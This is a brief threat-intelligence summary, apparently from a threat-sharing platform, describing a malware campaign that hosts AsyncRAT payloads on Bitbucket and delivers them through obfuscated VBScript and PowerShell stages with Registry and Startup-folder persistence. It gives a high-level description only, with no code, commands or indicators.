Malware by the (Bit)Bucket: Uncovering AsyncRAT

Tags

External References

• https://www.gdatasoftware.com/
• https://otx.alienvault.com/

Description

A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bitbucket's legitimacy and accessibility to host malicious payloads. The campaign employs various evasion techniques, including anti-VM checks and obfuscation. Persistence is established through Registry Run Keys and Startup Folder shortcuts. AsyncRAT provides extensive control over infected machines, enabling remote desktop control, file management, keylogging, and more. The attack demonstrates a high level of sophistication in its use of legitimate platforms and multi-layered obfuscation techniques.

Date